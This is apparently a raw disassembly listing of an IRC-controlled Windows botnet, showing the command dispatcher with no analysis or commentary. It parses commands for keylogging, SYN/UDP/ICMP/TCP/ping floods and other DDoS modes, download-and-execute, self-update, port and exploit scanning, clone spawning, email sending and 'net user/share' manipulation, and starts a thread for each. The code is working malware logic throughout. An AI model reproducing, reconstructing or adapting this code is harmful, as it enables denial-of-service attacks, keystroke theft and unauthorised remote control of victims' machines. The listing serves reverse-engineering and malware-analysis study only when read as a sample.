jmp loc_40697E
; ---------------------------------------------------------------------------
loc_406746: ; CODE XREF: sub_40274D+3FEC�j
push offset unk_42E4AC
jmp loc_4078C9
; ---------------------------------------------------------------------------
loc_406750: ; CODE XREF: sub_40274D+3ECA�j
push edi ; Str2
push offset aIdent ; "ident"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_406825
push [ebp+4Ch+var_8] ; Str2
push offset aOn ; "on"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_4067EB
push 2
call sub_40B075
test eax, eax
pop ecx
lea eax, [ebp+4Ch+Dst]
jle short loc_406794
push offset dword_42E484
jmp loc_4078CF
; ---------------------------------------------------------------------------
loc_406794: ; CODE XREF: sub_40274D+403B�j
push offset asc_42E458 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 2 ; int
push eax ; Source
call sub_40AE85
add esp, 14h
mov esi, eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
push esi
push offset sub_41321D
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
imul esi, 234h
cmp eax, ebx
mov dword_4444FC[esi], eax
jnz loc_40698D
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset dword_42E424
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_4067EB: ; CODE XREF: sub_40274D+4029�j
push [ebp+4Ch+var_8] ; Str2
push offset Str2 ; "off"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_40698D
push ebx
push 2
call sub_40B028
cmp eax, ebx
pop ecx
pop ecx
jle short loc_40681B
push eax
push offset dword_42E3EC
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_40681B: ; CODE XREF: sub_40274D+40C1�j
push offset dword_42E3CC
jmp loc_4078C9
; ---------------------------------------------------------------------------
loc_406825: ; CODE XREF: sub_40274D+4012�j
push edi ; Str2
push offset aKeylog ; "keylog"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_4069C6
push [ebp+4Ch+var_8] ; Str2
push offset aOn ; "on"
call _strcmp
test eax, eax
pop ecx
pop ecx
mov edi, offset aFile ; "file"
jz short loc_40689B
push [ebp+4Ch+var_8] ; Str2
push edi ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jz short loc_40689B
push [ebp+4Ch+var_8] ; Str2
push offset Str2 ; "off"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_40698D
push ebx
push 23h
call sub_40B028
cmp eax, ebx
pop ecx
pop ecx
jle short loc_406891
push eax
push offset dword_42E380
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_406891: ; CODE XREF: sub_40274D+4137�j
push offset dword_42E354
jmp loc_4078C9
; ---------------------------------------------------------------------------
loc_40689B: ; CODE XREF: sub_40274D+4103�j
; sub_40274D+4112�j
push 23h
call sub_40B075
test eax, eax
pop ecx
jle short loc_4068B1
push offset dword_42E334
jmp loc_4078C9
; ---------------------------------------------------------------------------
loc_4068B1: ; CODE XREF: sub_40274D+4158�j
mov eax, [ebp+4Ch+arg_4]
push [ebp+4Ch+var_8] ; Str2
mov [ebp+4Ch+var_C64], eax
mov eax, [ebp+4Ch+var_4]
push edi ; Str1
mov [ebp+4Ch+var_BDC], eax
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_4068DE
mov [ebp+4Ch+var_BD8], 1
jmp short loc_4068E7
; ---------------------------------------------------------------------------
loc_4068DE: ; CODE XREF: sub_40274D+4183�j
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_BD8], eax
loc_4068E7: ; CODE XREF: sub_40274D+418F�j
mov esi, [ebp+esi+4Ch+Format]
cmp esi, ebx
jnz short loc_406908
push offset byte_42B633 ; Str2
mov esi, offset a_fast__3 ; "#.fast.#"
push esi ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_406908
mov esi, [ebp+4Ch+Format]
loc_406908: ; CODE XREF: sub_40274D+41A0�j
; sub_40274D+41B6�j
push esi ; Format
lea eax, [ebp+4Ch+var_C5C]
push 80h ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+4Ch+Dst]
push offset asc_42E310 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 23h ; int
push eax ; Source
call sub_40AE85
add esp, 20h
mov [ebp+4Ch+var_C60], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_C64]
push eax
push offset sub_414BFB
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_C60]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_4069BC
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset asc_42E2D4 ; "-"
loc_40697E: ; CODE XREF: sub_40274D+1F36�j
; sub_40274D+2CAA�j ...
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call _sprintf
loc_40698A: ; CODE XREF: sub_40274D+2C9F�j
; sub_40274D+52AD�j
add esp, 0Ch
loc_40698D: ; CODE XREF: sub_40274D+1F4B�j
; sub_40274D+2CDA�j ...
cmp [ebp+4Ch+var_C], ebx
jnz loc_408D10
push ebx ; int
push [ebp+4Ch+var_4] ; int
lea eax, [ebp+4Ch+Dst]
push eax ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
loc_4069A7: ; CODE XREF: sub_40274D+628B�j
call sub_40123B
add esp, 14h
jmp loc_408D10
; ---------------------------------------------------------------------------
loc_4069B4: ; CODE XREF: sub_40274D+4275�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4069BC: ; CODE XREF: sub_40274D+4223�j
cmp [ebp+4Ch+var_BD4], ebx
jz short loc_4069B4
jmp short loc_40698D
; ---------------------------------------------------------------------------
loc_4069C6: ; CODE XREF: sub_40274D+40E7�j
push edi ; Str2
push offset aNet ; "net"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_406C82
cmp dword_444274, ebx
jz short loc_4069F5
cmp dword_44429C, ebx
jz short loc_4069F5
push offset unk_42E298
jmp loc_406C3F
; ---------------------------------------------------------------------------
loc_4069F5: ; CODE XREF: sub_40274D+4294�j
; sub_40274D+429C�j
cmp [ebp+4Ch+var_18], ebx
jz loc_406C4D
mov edi, [ebp+esi+4Ch+Format]
cmp edi, ebx
mov [ebp+4Ch+arg_0], ebx
jz short loc_406A17
push edi ; SubStr
push [ebp+4Ch+var_18] ; Str
call _strstr
pop ecx
pop ecx
mov [ebp+4Ch+arg_0], eax
loc_406A17: ; CODE XREF: sub_40274D+42BA�j
push [ebp+4Ch+var_8] ; Str2
push offset aStart ; "start"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_406A81
cmp edi, ebx
jz short loc_406A52
push [ebp+4Ch+arg_0]
push 3
loc_406A33: ; CODE XREF: sub_40274D+434C�j
; sub_40274D+4366�j ...
call sub_41BF46
push eax
lea eax, [ebp+4Ch+Dst]
push offset aS ; "%s"
push eax ; Dest
call _sprintf
add esp, 14h
jmp loc_406C4D
; ---------------------------------------------------------------------------
loc_406A52: ; CODE XREF: sub_40274D+42DF�j
push [ebp+4Ch+var_4] ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_41B681
add esp, 0Ch
test eax, eax
lea eax, [ebp+4Ch+Dst]
jz short loc_406A77
push offset unk_42E26C
jmp loc_406C45
; ---------------------------------------------------------------------------
loc_406A77: ; CODE XREF: sub_40274D+431E�j
push offset unk_42E24C
jmp loc_406C45
; ---------------------------------------------------------------------------
loc_406A81: ; CODE XREF: sub_40274D+42DB�j
push [ebp+4Ch+var_8] ; Str2
push offset aStop ; "stop"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_406A9B
push [ebp+4Ch+arg_0]
push 4
jmp short loc_406A33
; ---------------------------------------------------------------------------
loc_406A9B: ; CODE XREF: sub_40274D+4345�j
push [ebp+4Ch+var_8] ; Str2
push offset aPause ; "pause"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_406AB8
push [ebp+4Ch+arg_0]
push 5
jmp loc_406A33
; ---------------------------------------------------------------------------
loc_406AB8: ; CODE XREF: sub_40274D+435F�j
push [ebp+4Ch+var_8] ; Str2
push offset aContinue ; "continue"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_406AD5
push [ebp+4Ch+arg_0]
push 6
jmp loc_406A33
; ---------------------------------------------------------------------------
loc_406AD5: ; CODE XREF: sub_40274D+437C�j
push [ebp+4Ch+var_8] ; Str2
push offset aDelete ; "delete"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_406AF2
push [ebp+4Ch+arg_0]
push 1
jmp loc_406A33
; ---------------------------------------------------------------------------
loc_406AF2: ; CODE XREF: sub_40274D+4399�j
push [ebp+4Ch+var_8] ; Str2
push offset aShare ; "share"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_406B6C
cmp edi, ebx
jz short loc_406B3C
cmp [ebp+4Ch+var_904], bl
jz short loc_406B17
push ebx
push edi
push 1
jmp short loc_406B1D
; ---------------------------------------------------------------------------
loc_406B17: ; CODE XREF: sub_40274D+43C2�j
push [ebp+esi+4Ch+var_98] ; int
push edi ; Str
push ebx ; int
loc_406B1D: ; CODE XREF: sub_40274D+43C8�j
call sub_41BFBE
push eax
lea eax, [ebp+4Ch+Dst]
push offset aS ; "%s"
push eax ; Dest
call _sprintf
add esp, 18h
jmp loc_406C4D
; ---------------------------------------------------------------------------
loc_406B3C: ; CODE XREF: sub_40274D+43BA�j
push ebx ; int
push [ebp+4Ch+var_4] ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_41C07C
add esp, 10h
test eax, eax
lea eax, [ebp+4Ch+Dst]
jz short loc_406B62
push offset unk_42E204
jmp loc_406C45
; ---------------------------------------------------------------------------
loc_406B62: ; CODE XREF: sub_40274D+4409�j
push offset unk_42E1E4
jmp loc_406C45
; ---------------------------------------------------------------------------
loc_406B6C: ; CODE XREF: sub_40274D+43B6�j
push [ebp+4Ch+var_8] ; Str2
push offset aUser_0 ; "user"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_406BF4
cmp edi, ebx
jz short loc_406BCA
cmp [ebp+4Ch+var_904], bl
push [ebp+4Ch+var_4] ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
jz short loc_406B9A
push ebx
push edi
push 1
jmp short loc_406BAB
; ---------------------------------------------------------------------------
loc_406B9A: ; CODE XREF: sub_40274D+4445�j
mov esi, [ebp+esi+4Ch+var_98]
cmp esi, ebx
jz short loc_406BA7
push esi
push edi
push ebx
jmp short loc_406BAB
; ---------------------------------------------------------------------------
loc_406BA7: ; CODE XREF: sub_40274D+4453�j
push ebx ; int
push edi ; int
push 2 ; int
loc_406BAB: ; CODE XREF: sub_40274D+444B�j
; sub_40274D+4458�j
call sub_41C19B
push eax
lea eax, [ebp+4Ch+Dst]
push offset aS ; "%s"
push eax ; Dest
call _sprintf
add esp, 24h
jmp loc_406C4D
; ---------------------------------------------------------------------------
loc_406BCA: ; CODE XREF: sub_40274D+4434�j
push ebx ; int
push [ebp+4Ch+var_4] ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_41C265
add esp, 10h
test eax, eax
lea eax, [ebp+4Ch+Dst]
jz short loc_406BED
push offset unk_42E1C4
jmp short loc_406C45
; ---------------------------------------------------------------------------
loc_406BED: ; CODE XREF: sub_40274D+4497�j
push offset unk_42E1A4
jmp short loc_406C45
; ---------------------------------------------------------------------------
loc_406BF4: ; CODE XREF: sub_40274D+4430�j
push [ebp+4Ch+var_8] ; Str2
push offset aSend ; "send"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_406C3A
cmp edi, ebx
jz short loc_406C33
push [ebp+4Ch+var_4]
push [ebp+4Ch+Format]
push [ebp+4Ch+arg_4]
push [ebp+4Ch+arg_0] ; Source
call sub_41BE8A
push eax
lea eax, [ebp+4Ch+Dst]
push offset aS ; "%s"
push eax ; Dest
call _sprintf
add esp, 1Ch
jmp short loc_406C4D
; ---------------------------------------------------------------------------
loc_406C33: ; CODE XREF: sub_40274D+44BC�j
push offset unk_42E180
jmp short loc_406C3F
; ---------------------------------------------------------------------------
loc_406C3A: ; CODE XREF: sub_40274D+44B8�j
push offset asc_42E164 ; "-"
loc_406C3F: ; CODE XREF: sub_40274D+2C4D�j
; sub_40274D+42A3�j ...
lea eax, [ebp+4Ch+Dst]
loc_406C45: ; CODE XREF: sub_40274D+4325�j
; sub_40274D+432F�j ...
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_406C4D: ; CODE XREF: sub_40274D+42AB�j
; sub_40274D+4300�j ...
cmp [ebp+4Ch+var_C], ebx
jnz short loc_406C6B
push ebx ; int
push [ebp+4Ch+var_4] ; int
lea eax, [ebp+4Ch+Dst]
push eax ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
add esp, 14h
loc_406C6B: ; CODE XREF: sub_40274D+27A3�j
; sub_40274D+27D7�j ...
mov esi, [ebp+4Ch+arg_24]
loc_406C6E: ; CODE XREF: sub_40274D+65C6�j
; sub_40274D+7503�j ...
lea eax, [ebp+4Ch+Dst]
push eax
call sub_417D70
pop ecx
mov eax, esi
jmp loc_402B95
; ---------------------------------------------------------------------------
loc_406C82: ; CODE XREF: sub_40274D+4288�j
push edi ; Str2
push offset aCapture ; "capture"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40968E
push edi ; Str2
push offset aCap ; "cap"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40968E
push edi ; Str2
push offset aGethost ; "gethost"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4095B9
push edi ; Str2
push offset aGh ; "gh"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4095B9
loc_406CD6: ; CODE XREF: sub_40274D+39D7�j
; sub_40274D+3A06�j ...
mov edi, [ebp+esi+4Ch+Format]
cmp edi, ebx
mov [ebp+4Ch+var_20], edi
jz loc_402B92
push [ebp+4Ch+var_10] ; Str2
push offset aKilllog ; "killlog"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40959F
push [ebp+4Ch+var_10] ; Str2
push offset aKl ; "kl"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40959F
push [ebp+4Ch+var_10] ; Str2
push offset aAddalias ; "addalias"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40955E
push [ebp+4Ch+var_10] ; Str2
push offset aAa ; "aa"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40955E
push [ebp+4Ch+var_10] ; Str2
push offset aPrivmsg_0 ; "privmsg"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409504
push [ebp+4Ch+var_10] ; Str2
push offset aPm ; "pm"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409504
push [ebp+4Ch+var_10] ; Str2
push offset aAction ; "action"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409492
push [ebp+4Ch+var_10] ; Str2
push offset aA ; "a"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409492
push [ebp+4Ch+var_10] ; Str2
push offset aCycle ; "cycle"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409434
push [ebp+4Ch+var_10] ; Str2
push offset aCy ; "cy"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409434
push [ebp+4Ch+var_10] ; Str2
push offset aMode ; "mode"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4093FB
push [ebp+4Ch+var_10] ; Str2
push offset aM_0 ; "m"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4093FB
push [ebp+4Ch+var_10] ; Str2
push offset aC_raw ; "c_raw"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40938F
push [ebp+4Ch+var_10] ; Str2
push offset aC_r ; "c_r"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40938F
push [ebp+4Ch+var_10] ; Str2
push offset aC_mode ; "c_mode"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40930C
push [ebp+4Ch+var_10] ; Str2
push offset aC_m ; "c_m"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40930C
push [ebp+4Ch+var_10] ; Str2
push offset aC_nick ; "c_nick"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4092A4
push [ebp+4Ch+var_10] ; Str2
push offset aC_n ; "c_n"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4092A4
push [ebp+4Ch+var_10] ; Str2
push offset aC_join ; "c_join"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409281
push [ebp+4Ch+var_10] ; Str2
push offset aC_j ; "c_j"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409281
push [ebp+4Ch+var_10] ; Str2
push offset aC_part ; "c_part"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409243
push [ebp+4Ch+var_10] ; Str2
push offset aC_p ; "c_p"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409243
push [ebp+4Ch+var_10] ; Str2
push offset aTarga3 ; "targa3"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409151
push [ebp+4Ch+var_10] ; Str2
push offset aT3 ; "t3"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409151
push [ebp+4Ch+var_10] ; Str2
push offset aTsunami ; "tsunami"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409083
push [ebp+4Ch+var_10] ; Str2
push offset aTsn ; "tsn"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409083
push [ebp+4Ch+var_10] ; Str2
push offset aRepeat ; "repeat"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_408FCA
push [ebp+4Ch+var_10] ; Str2
push offset aRp ; "rp"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_408FCA
push [ebp+4Ch+var_10] ; Str2
push offset aDelay ; "delay"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_408F39
push [ebp+4Ch+var_10] ; Str2
push offset aDe ; "de"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_408F39
push [ebp+4Ch+var_10] ; Str2
push offset aUpdate ; "update"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_408DC3
push [ebp+4Ch+var_10] ; Str2
push offset aUp ; "up"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_408DC3
push [ebp+4Ch+var_10] ; Str2
push offset aExecute ; "execute"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_408D2A
push [ebp+4Ch+var_10] ; Str2
push offset aE ; "e"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_408D2A
push [ebp+4Ch+var_10] ; Str2
push offset aFindfile ; "findfile"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_408C21
push [ebp+4Ch+var_10] ; Str2
push offset aFf ; "ff"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_408C21
push [ebp+4Ch+var_10] ; Str2
push offset aRename ; "rename"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_408BCD
push [ebp+4Ch+var_10] ; Str2
push offset aMv ; "mv"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_408BCD
push [ebp+4Ch+var_10] ; Str2
push offset aIcmpflood ; "icmpflood"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_408AD6
push [ebp+4Ch+var_10] ; Str2
push offset aIcmp ; "icmp"
call _strcmp
test eax, eax
pop ecx
pop ecx
loc_407077: ; DATA XREF: .data:0043F23C�o
; .data:0043F250�o ...
jz loc_408AD6
mov eax, [ebp+esi+4Ch+var_98]
cmp eax, ebx
mov [ebp+4Ch+arg_0], eax
jz loc_402B92
push [ebp+4Ch+var_10] ; Str2
push offset aClone_0 ; "clone"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4089EF
push [ebp+4Ch+var_10] ; Str2
push offset aC ; "c"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4089EF
push [ebp+4Ch+var_10] ; Str2
push offset aDdos_syn ; "ddos.syn"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4088D6
push [ebp+4Ch+var_10] ; Str2
push offset aDdos_ack ; "ddos.ack"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4088D6
push [ebp+4Ch+var_10] ; Str2
push offset aDdos_random ; "ddos.random"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4088D6
push [ebp+4Ch+var_10] ; Str2
push offset aWisdom_udp ; "wisdom.udp"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_4071DF
push 7Fh
pop esi
push esi ; Count
push [ebp+4Ch+var_8] ; Source
lea eax, [ebp+4Ch+var_3070]
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+4Ch+var_2FF0]
push edi ; Source
push eax ; Dest
call _strncpy
push esi ; Count
push [ebp+4Ch+arg_0] ; Source
lea eax, [ebp+4Ch+var_2F70]
push eax ; Dest
call _strncpy
push esi ; Count
push [ebp+4Ch+Format] ; Source
lea eax, [ebp+4Ch+var_2EF0]
push eax ; Dest
call _strncpy
mov eax, [ebp+4Ch+var_C]
mov edi, [ebp+4Ch+var_4]
mov esi, [ebp+4Ch+arg_4]
push ebx ; int
mov [ebp+4Ch+var_2E68], eax
lea eax, [ebp+4Ch+Dst]
push 13h ; int
push eax ; Source
mov [ebp+4Ch+var_2E6C], edi
mov [ebp+4Ch+var_3074], esi
call sub_40AE85
add esp, 3Ch
mov [ebp+4Ch+var_2E70], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_3074]
push eax
push offset sub_4175F3
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_2E70]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_4071D2
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42DFE0
jmp loc_40491A
; ---------------------------------------------------------------------------
loc_4071CA: ; CODE XREF: sub_40274D+4A8B�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4071D2: ; CODE XREF: sub_40274D+4A6A�j
cmp [ebp+4Ch+var_2E64], ebx
jz short loc_4071CA
jmp loc_404929
; ---------------------------------------------------------------------------
loc_4071DF: ; CODE XREF: sub_40274D+49C3�j
push [ebp+4Ch+var_10] ; Str2
push offset aSynflood ; "synflood"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4087F2
push [ebp+4Ch+var_10] ; Str2
push offset aSyn ; "syn"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4087F2
push [ebp+4Ch+var_10] ; Str2
push offset aSkysyn ; "skysyn"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_407308
push 7Fh
pop esi
push esi ; Count
push [ebp+4Ch+var_8] ; Source
lea eax, [ebp+4Ch+var_3498]
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+4Ch+var_3418]
push edi ; Source
push eax ; Dest
call _strncpy
push esi ; Count
push [ebp+4Ch+arg_0] ; Source
lea eax, [ebp+4Ch+var_3398]
push eax ; Dest
call _strncpy
push esi ; Count
push [ebp+4Ch+Format] ; Source
lea eax, [ebp+4Ch+var_3318]
push eax ; Dest
call _strncpy
push [ebp+4Ch+arg_0]
mov eax, [ebp+4Ch+var_4]
mov esi, [ebp+4Ch+arg_4]
push edi
push [ebp+4Ch+var_8]
mov [ebp+4Ch+var_3294], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_3290], eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42DF98 ; "-"
push eax ; Dest
mov [ebp+4Ch+var_349C], esi
call _sprintf
add esp, 44h
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 10h ; int
push eax ; Source
call sub_40AE85
add esp, 0Ch
mov [ebp+4Ch+var_3298], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_349C]
push eax
push offset sub_41640E
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_3298]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_4072FB
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset dword_42DF5C
jmp loc_4089B1
; ---------------------------------------------------------------------------
loc_4072F3: ; CODE XREF: sub_40274D+4BB4�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4072FB: ; CODE XREF: sub_40274D+4B93�j
cmp [ebp+4Ch+var_328C], ebx
jz short loc_4072F3
jmp loc_4089C0
; ---------------------------------------------------------------------------
loc_407308: ; CODE XREF: sub_40274D+4AD1�j
push [ebp+4Ch+var_10] ; Str2
push offset aPhatwonk ; "phatwonk"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40870E
push [ebp+4Ch+var_10] ; Str2
push offset aWonk ; "wonk"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40870E
push [ebp+4Ch+var_10] ; Str2
push offset aDownload ; "download"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4085D7
push [ebp+4Ch+var_10] ; Str2
push offset aDl ; "dl"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4085D7
push [ebp+4Ch+var_10] ; Str2
push offset aRedirect ; "redirect"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4084E1
push [ebp+4Ch+var_10] ; Str2
push offset aRd ; "rd"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4084E1
push [ebp+4Ch+var_10] ; Str2
push offset aScan_0 ; "scan"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4083F2
push [ebp+4Ch+var_10] ; Str2
push offset aSc ; "sc"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4083F2
push [ebp+4Ch+var_10] ; Str2
push offset aC_privmsg ; "c_privmsg"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4082F0
push [ebp+4Ch+var_10] ; Str2
push offset aC_pm ; "c_pm"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4082F0
push [ebp+4Ch+var_10] ; Str2
push offset aC_action ; "c_action"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4081FB
push [ebp+4Ch+var_10] ; Str2
push offset aC_a ; "c_a"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4081FB
mov eax, [ebp+esi+4Ch+var_94]
cmp eax, ebx
mov [ebp+4Ch+var_14], eax
jz loc_402B92
push [ebp+4Ch+var_10] ; Str2
push offset aPortscan ; "portscan"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4080F9
push [ebp+4Ch+var_10] ; Str2
push offset aPsc ; "psc"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4080F9
push [ebp+4Ch+var_10] ; Str2
push offset aAdvscan ; "advscan"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_407C2E
push [ebp+4Ch+var_10] ; Str2
push offset aAsc ; "asc"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_407C2E
push [ebp+4Ch+var_10] ; Str2
push offset aUdpflood ; "udpflood"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_407B12
push [ebp+4Ch+var_10] ; Str2
push offset aUdp ; "udp"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_407B12
push [ebp+4Ch+var_10] ; Str2
push offset aU ; "u"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_407B12
push [ebp+4Ch+var_10] ; Str2
push offset aNetsend ; "netsend"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4079FF
push [ebp+4Ch+var_10] ; Str2
push offset aNs ; "ns"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4079FF
push [ebp+4Ch+var_10] ; Str2
push offset aPingflood ; "pingflood"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4078DC
push [ebp+4Ch+var_10] ; Str2
push offset aPing_0 ; "ping"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4078DC
push [ebp+4Ch+var_10] ; Str2
push offset aP ; "p"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4078DC
push [ebp+4Ch+var_10] ; Str2
push offset aTcpflood ; "tcpflood"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40773D
push [ebp+4Ch+var_10] ; Str2
push offset aTcp ; "tcp"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40773D
push [ebp+4Ch+var_10] ; Str2
push offset aEmail ; "email"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_4076E8
push [ebp+4Ch+var_8] ; Source
lea eax, [ebp+4Ch+var_47F4]
push eax ; Dest
call _strcpy
push edi ; Str
call j__atol
push [ebp+4Ch+arg_0] ; Source
mov [ebp+4Ch+var_20], eax
lea eax, [ebp+4Ch+var_4090]
push eax ; Dest
call _strcpy
push [ebp+4Ch+var_14] ; Source
lea eax, [ebp+4Ch+var_4390]
push eax ; Dest
call _strcpy
push offset asc_42FE58 ; " "
push offset a_ ; "_"
push [ebp+esi+4Ch+var_90] ; Dest
call sub_41AB7D
push eax ; Source
lea eax, [ebp+4Ch+var_4290]
push eax ; Dest
call _strcpy
add esp, 30h
lea eax, [ebp+4Ch+var_5590]
push eax
push 101h
call dword_444110 ; WSAStartup
lea eax, [ebp+4Ch+var_47F4]
